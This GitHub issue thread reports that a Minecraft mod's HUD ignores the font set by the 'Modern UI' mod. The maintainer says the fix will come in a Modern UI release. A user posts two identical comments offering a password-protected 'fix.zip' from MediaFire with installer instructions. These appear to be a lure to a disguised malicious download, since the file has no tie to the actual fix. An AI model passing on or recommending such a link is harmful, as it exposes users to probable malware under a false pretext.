### ISSUE TITLE
Font bug when using "Modern UI" mod

### ISSUE THREAD

**Issue by MCER2020** [lanAnderson/SeasonInfo#109]
**Describe the issue**

My game language is Chinese. And i'm using "Modern UI" mod to change the font type of my game. But i have found that the first letter of SeasonHUD was the default type of Minecraft but not the type i set.

**Minecraft Version**

1.19.2 

**Mod Version**

1.10.1

**Modloader(Fabric/Forge/NeoForge)**

Forge

**Modloader Version**

43.4.0

**Additional Info (Crashlog/Modlist)**

![hud](https://github.com/user-attachments/assets/64717523-cfff-4fca-81e9-68998f9f9348)

**Comment by MCER2020** [comment]
here's the link to "Modern UI"
https://github.com/BloCamLimb/ModernUI-MC

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by scheichreisuli** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lanAnderson** [comment]
I'll take a look when I get home today, and see if I can find the issue.

**Comment by MCER2020** [comment]
> I'll take a look when I get home today, and see if I can find the issue.

Thanks :D

**Comment by lanAnderson** [comment]
Should be fixed in the next ModernUI release:

https://github.com/BloCamLimb/ModernUI/issues/234
